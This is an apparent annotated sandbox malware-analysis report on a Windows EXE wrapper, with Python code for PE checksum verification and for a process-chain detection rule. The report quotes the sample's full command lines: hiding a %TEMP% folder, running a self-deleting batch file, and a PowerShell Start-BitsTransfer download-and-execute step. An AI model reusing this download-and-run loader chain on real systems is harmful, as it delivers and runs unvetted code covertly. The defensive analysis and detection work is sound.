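CHECKSUM_OFFSET_IN_OPT = 0x40  # CheckSum sits at +0x40 in both PE32 and PE32+ optional headers


def checksum_field_offset(data: bytes) -> int:
    """File offset of OptionalHeader.CheckSum: e_lfanew + 'PE\\0\\0' + 20-byte COFF header + 0x40."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    return e_lfanew + 4 + 20 + CHECKSUM_OFFSET_IN_OPT


def compute_checksum(data: bytes) -> int:
    """CheckSumMappedFile: fold 16-bit words with end-around carry, then add the file length."""
    skip = checksum_field_offset(data)
    padded = bytes(data) + b"\0" * (len(data) % 2)   # odd-length files get one zero byte
    total = 0
    for off in range(0, len(padded), 2):
        if off in (skip, skip + 2):                   # the 4-byte CheckSum field is excluded
            continue
        total += struct.unpack_from("<H", padded, off)[0]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)          # fold any final carry
    return total + len(data)


def read_stored_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, checksum_field_offset(data))[0]


def verify(data: bytes) -> dict:
    """Produce the sandbox's 'real checksum / should be' comparison plus a verdict."""
    stored, computed = read_stored_checksum(data), compute_checksum(data)
    if stored == 0:
        status = "unset"      # linker never wrote one (common for non-Microsoft toolchains)
    elif stored == computed:
        status = "ok"
    else:
        status = "mismatch"   # changed after linking: packer, appended payload, or on-disk tampering
    return {"stored": stored, "computed": computed, "status": status}


def verify_file(path: str) -> dict:
    with open(path, "rb") as fh:
        return verify(fh.read())


def set_checksum(data: bytes) -> bytearray:
    """Return a copy with the header field fixed up, as link.exe /RELEASE would do."""
    fixed = bytearray(data)
    struct.pack_into("<I", fixed, checksum_field_offset(fixed), compute_checksum(fixed))
    return fixed


def build_minimal_pe32(payload: bytes, stored_checksum: int = 0) -> bytearray:
    """Constructed, non-loadable PE32 skeleton: DOS header, PE signature, COFF header,
    zeroed optional header with only Magic and CheckSum set, then an arbitrary payload tail."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, OPT_HDR_SIZE_PE32, 0x0102)  # i386, 1 section
    opt = bytearray(OPT_HDR_SIZE_PE32)
    struct.pack_into("<H", opt, 0, 0x10B)                               # PE32 magic
    struct.pack_into("<I", opt, CHECKSUM_OFFSET_IN_OPT, stored_checksum)
    return dos + b"PE\0\0" + coff + opt + payload


# Constructed test image; the 13-byte payload makes the length odd to exercise the padding path.
IMAGE = build_minimal_pe32(b"section bytes")

if __name__ == "__main__":
    print("as built :", verify(IMAGE))               # status 'unset', like BITC7F8.tmp above
    print("fixed up :", verify(set_checksum(IMAGE)))
    tampered = set_checksum(IMAGE)
    tampered[0x10] ^= 0x01                           # flip one byte of DOS-header padding
    print("tampered :", verify(tampered))            # status 'mismatch', like the sample above
```

A zero field is a weak signal on its own, since many toolchains never set it; a non-zero mismatch is the stronger one, because whoever last wrote the file either did not know about the field or did not care, which is what packers and self-appending wrappers look like.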

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: \KnownDlls32\BitsProxy.dll
Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\Desktop\Android TV Tools - Aux Files\BITC7F8.tmp
Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exe (copy)

Reading note: BITS downloads into a BIT<hex>.tmp file in the destination directory and renames it to the requested name on completion, which is the "(copy)" above. In file-creation telemetry the writer is the BITS service host (svchost.exe), so a rule that only looks for powershell.exe writing a PE to disk will not see this drop. Nothing in this section is a persistence mechanism in the usual sense (no Run key, scheduled task or service is created); the heading is the sandbox's category for installation-time file writes.

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 times)

Reading note: these are the module manifest and its localized help manifest being read, not BitLocker cmdlets being invoked. The only PowerShell command in this run is Start-BitsTransfer (see the process tree); when a cmdlet is not yet loaded, PowerShell's command discovery reads module manifests under PSModulePath to find the module that exports it, and BitLocker.psd1 is one of them. Treat the "Loading BitLocker PowerShell Module" signature as a false positive here unless a BitLocker cmdlet shows up in a command line.
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (109 occurrences)

Reading note: this is SetErrorMode(SEM_NOOPENFILEERRORBOX), which suppresses the "file not found" dialog when a library probe fails. Managed hosts such as powershell.exe set it repeatedly while probing for assemblies and native images, which is why it appears in bulk there. It is listed under "hiding" because a silent failure mode is also what a loader wants, but it is not evidence of anything the script did.

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Code function: 0_2_004036D1
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Code function: 0_2_00404D37
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE  ping google.com -n 1 (listed twice by the sandbox, once as "ping to sleep" and once as "ping to check other devices"; with -n 1 this is a single echo request issued right before the Start-BitsTransfer download, so it behaves as an internet-connectivity gate, not as the ping 127.0.0.1 -n N sleep idiom)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (twice; this is TimeSpan.MaxValue expressed in milliseconds, i.e. an infinite timeout, consistent with the synchronous Start-BitsTransfer call blocking until the BITS job finishes rather than with a timed sleep)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5647
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4123
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | TID 4768: Thread sleep count: 5647 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | TID 6628: Thread sleep count: 4123 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | TID 6388: Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\svchost.exe | TID 6052: Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: svchost.exe, 0000000C.00000002.3239610476.000001C0D9A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3240534812.000001C0DF253000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | API call chain: ExitProcess graph end node (graph_0-7159)
Source: C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exe | API call chain: ExitProcess graph end node (graph_14-1880)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Reading note: the thousands of short waits and the infinite wait all belong to powershell.exe while Start-BitsTransfer polls the job state, and the PhysicalDrive0 open and the "Hyper-V RAW" string both sit in the BITS service host (svchost.exe, the process the sandbox numbers 12), a Windows service, not in the sample. The only evasion-category artefacts attributable to the sample itself are the two unnamed code functions above and the GetTickCount routine in the next section.

Anti Debugging

Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Debugger detection routine: GetTickCount, GetTickCount, DecisionNodes, ExitProcess or Sleep (graph_0-7470): a timing check, two GetTickCount reads around a code span with the elapsed delta deciding between continuing, sleeping or exiting; single-stepping or breakpoints inflate the delta and trip it
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Code function: 0_2_0040B641 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress (the same run-time API resolution flagged earlier)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (SeDebugPrivilege enabled by the powershell.exe host itself; this is seen in benign PowerShell runs as well, and the command line shown in the process tree does not request it)

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\svchost.exe | File created: BITC7F8.tmp.12.dr
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Process created: C:\Windows\SysWOW64\cmd.exe  C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\afolder" mkdir "C:\Users\user\AppData\Local\Temp\afolder"
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Process created: C:\Windows\SysWOW64\cmd.exe  C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\ytmp" mkdir "C:\Users\user\AppData\Local\Temp\ytmp"
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Process created: C:\Windows\SysWOW64\cmd.exe  C:\Windows\system32\cmd.exe /c attrib +h C:\Users\user\AppData\Local\Temp\ytmp
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Process created: C:\Windows\SysWOW64\cmd.exe  C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat"
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Process created: C:\Windows\SysWOW64\cmd.exe  C:\Windows\system32\cmd.exe /c if exist "C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe" del "C:\Users\user\AppData\Local\Temp\ytmp\tmp4785.exe"
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exe | Process created: C:\Windows\SysWOW64\cmd.exe  C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\attrib.exe  attrib +h C:\Users\user\AppData\Local\Temp\ytmp
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE  ping google.com -n 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -Command "Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\cmdmax.exe'"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exe  "Android TV Tools - Aux Files\cmdmax.exe" 20 234 120 31 120 9999

Reading note: read top to bottom, this is consistent with a batch-to-EXE wrapper bootstrapping itself. The EXE creates %TEMP%\afolder and %TEMP%\ytmp, hides ytmp with attrib +h, removes any stale tmp8939.bat and tmp4785.exe, then runs tmp8939.bat with its own path as the first argument. Everything that follows is the content of that batch file executed by the child cmd.exe: one ping, a Start-BitsTransfer fetch of cmdmax-x86.exe from the tenox7/cmdmax GitHub release into "Android TV Tools - Aux Files", and the launch of cmdmax.exe with six numeric arguments that the report does not interpret. The loader pattern (hidden %TEMP% directory, self-deleting .bat, LOLBin download) is what this category keys on; the batch file body is where the actual intent lives.
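The process chain listed above (it also appears under "Process created" earlier in the report) is the part worth a detection: a desktop EXE spawns cmd.exe to create and hide a %TEMP% directory, runs a .bat from it with its own path as argument, and that .bat pings once and then fetches a PE with Start-BitsTransfer. The following is an added example, not part of the report: it runs a parent/child/sibling correlation over constructed process-creation events (Sysmon event 1 style fields; the PIDs, the explorer.exe control case and the example.com URL are invented) and fires only when several stages co-occur, so an administrator running Start-BitsTransfer from an interactive shell is not flagged.

```python
"""Correlate the cmd.exe / ping / Start-BitsTransfer dropper chain over process events.

Added example (not from the Joe Sandbox report). Events are constructed to mirror
the report's process tree; PIDs and the benign control case are invented.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str       # full path of the created process
    cmdline: str     # its command line


# Stage patterns, each tied to one line of the report's process tree.
TEMP_HIDE = re.compile(r"attrib\s+\+h\s+.*\\AppData\\Local\\Temp\\", re.I)
PING_GATE = re.compile(r"^ping\s+\S+\s+-n\s+1\b", re.I)
BITS_DL = re.compile(r"start-bitstransfer\s+.*-source\s+https?://", re.I)
BAT_SELF = re.compile(r"\\Temp\\.*\.bat\s+\"[^\"]+\.exe\"", re.I)

# Constructed events mirroring the report (PIDs invented; the last two are a benign control).
EVENTS = [
    ProcEvent(1896, 1000, r"C:\Users\user\Desktop\Android TV Tools v3_ES.exe",
              r'"C:\Users\user\Desktop\Android TV Tools v3_ES.exe"'),
    ProcEvent(2100, 1896, r"C:\Windows\SysWOW64\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c if not exist "C:\Users\user\AppData\Local\Temp\ytmp" mkdir "C:\Users\user\AppData\Local\Temp\ytmp"'),
    ProcEvent(2101, 1896, r"C:\Windows\SysWOW64\cmd.exe",
              r"C:\Windows\system32\cmd.exe /c attrib +h C:\Users\user\AppData\Local\Temp\ytmp"),
    ProcEvent(2102, 1896, r"C:\Windows\SysWOW64\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\ytmp\tmp8939.bat "C:\Users\user\Desktop\Android TV Tools v3_ES.exe"'),
    ProcEvent(2200, 2102, r"C:\Windows\SysWOW64\PING.EXE", "ping google.com -n 1"),
    ProcEvent(2201, 2102, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -Command \"Start-bitsTransfer -Source https://github.com/tenox7/cmdmax/releases/download/2.0/cmdmax-x86.exe -Destination 'Android TV Tools - Aux Files\\cmdmax.exe'\""),
    ProcEvent(2202, 2102, r"C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exe",
              r'"Android TV Tools - Aux Files\cmdmax.exe" 20 234 120 31 120 9999'),
    # Benign control (invented): an admin fetching an installer from an interactive shell.
    ProcEvent(3000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(3001, 3000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -Command \"Start-BitsTransfer -Source https://example.com/update.msi -Destination C:\\Temp\\update.msi\""),
]


def _ancestors(by_pid, pid, limit=8):
    """Parent chain of pid, nearest first; stops at an unknown ppid or after limit hops."""
    chain, ev = [], by_pid.get(pid)
    while ev is not None and len(chain) < limit:
        ev = by_pid.get(ev.ppid)
        if ev is None:
            break
        chain.append(ev)
    return chain


def _is(ev, name):
    return ev is not None and ev.image.lower().endswith("\\" + name)


def detect_bits_dropper_chain(events, min_indicators=3):
    """One finding per powershell.exe BITS download whose surroundings match the report's chain."""
    by_pid = {e.pid: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)

    findings = []
    for ev in events:
        if not (_is(ev, "powershell.exe") and BITS_DL.search(ev.cmdline)):
            continue
        indicators = ["powershell.exe downloads from a URL via Start-BitsTransfer"]
        chain = _ancestors(by_pid, ev.pid)
        parent = chain[0] if chain else None
        if _is(parent, "cmd.exe"):
            indicators.append("parent is cmd.exe")
            if BAT_SELF.search(parent.cmdline):
                indicators.append("parent runs a %TEMP% .bat with an .exe path as argument")
            if any(PING_GATE.search(s.cmdline) for s in children.get(parent.pid, [])):
                indicators.append("sibling: single-echo ping issued from the same cmd.exe")
        if len(chain) >= 2 and any(TEMP_HIDE.search(u.cmdline) for u in children.get(chain[1].pid, [])):
            indicators.append("grandparent also hid a %TEMP% directory with attrib +h")
        if len(indicators) >= min_indicators:
            root = chain[-1] if chain else ev
            findings.append({"pid": ev.pid, "root": root.image, "indicators": indicators})
    return findings


if __name__ == "__main__":
    for f in detect_bits_dropper_chain(EVENTS):
        print(f"pid {f['pid']} under {f['root']}:")
        for i in f["indicators"]:
            print("  -", i)
```

The threshold is deliberate: Start-BitsTransfer from cmd.exe alone is common in deployment scripts, and a lone ping is noise; it is the co-occurrence of the hidden %TEMP% drop directory, the self-referencing .bat and the LOLBin download under one non-shell root process that makes the chain worth an alert. Remember from the sections above that the file write itself is attributed to svchost.exe (the BITS host), so pair this process-tree rule with file-creation telemetry keyed on BIT*.tmp rather than on the PowerShell process.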
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (3 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll

Reading note: the paths queried are Windows catalog files and GAC assemblies, which is what .NET assembly loading and Authenticode catalog lookups touch; none of them is a volume serial query by the sample, so the "queries the volume information" signature is host noise in this run.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Android TV Tools v3_ES.exeCode function: 0_2_00406444 EntryPoint,GetVersion,GetCommandLineA,0_2_00406444
MITRE ATT&CK Matrix (tactic: techniques listed in the report's matrix; a number in parentheses is the count badge shown next to that technique)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Scripting (1); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Command and Scripting Interpreter (2); Native API (11); Exploitation for Client Execution (1); Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: BITS Jobs (1); Scripting (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (131); BITS Jobs (1); Process Injection (11); Obfuscated Files or Information (1); DLL Side-Loading (1); Compile After Delivery
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery (211); Process Discovery (1); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); Remote System Discovery (1); System Network Configuration Discovery (1); System Information Discovery (22)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (3); Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph ID: 1447534 | Sample: Android TV Tools v3_ES.exe | Startdate: 25/05/2024 | Architecture: WINDOWS | Score: 88
Domains contacted: github.com, objects.githubusercontent.com, google.com
Top-level signatures: Multi AV Scanner detection for submitted file; Found API chain indicative of debugger detection; Sigma detected: Invoke-Obfuscation CLIP+ Launcher; 2 other signatures
Process tree as drawn in the graph:
  • Android TV Tools v3_ES.exe (started); dropped C:\Users\user\AppData\Local\...\tmp8939.bat (DOS)
      • cmd.exe (started); signature: Uses ping.exe to sleep
          • powershell.exe (started); signatures: Powershell uses Background Intelligent Transfer Service (BITS); Loading BitLocker PowerShell Module
          • PING.EXE (started); contacts google.com 142.250.186.46 GOOGLEUS United States
          • cmdmax.exe (started)
      • cmd.exe (started); signature: Uses ping.exe to check the status of other devices and networks
      • cmd.exe (started)
          • attrib.exe (started)
      • 4 other processes
  • svchost.exe (started); signature: Benign windows process drops PE files
      contacts: github.com 140.82.121.4, 443, 49707, 49709 GITHUBUS United States; objects.githubusercontent.com 185.199.108.133, 443, 49708, 49710 FASTLYUS Netherlands; 127.0.0.1 unknown unknown
      dropped: C:\Users\user\Desktop\...\cmdmax.exe (copy), PE32; C:\Users\user\Desktop\...\BITC7F8.tmp, PE32

Source | Detection | Scanner | Label
Android TV Tools v3_ES.exe | 12% | ReversingLabs |
Android TV Tools v3_ES.exe | 14% | Virustotal |

Source | Detection | Scanner | Label
C:\Users\user\Desktop\Android TV Tools - Aux Files\BITC7F8.tmp | 2% | ReversingLabs |
C:\Users\user\Desktop\Android TV Tools - Aux Files\cmdmax.exe (copy) | 2% | ReversingLabs |

No Antivirus matches

Source | Detection | Scanner | Label
google.com | 1% | Virustotal |
github.com | 0% | Virustotal |
objects.githubusercontent.com | 1% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
google.com | 142.250.186.46 | true | false | - | unknown
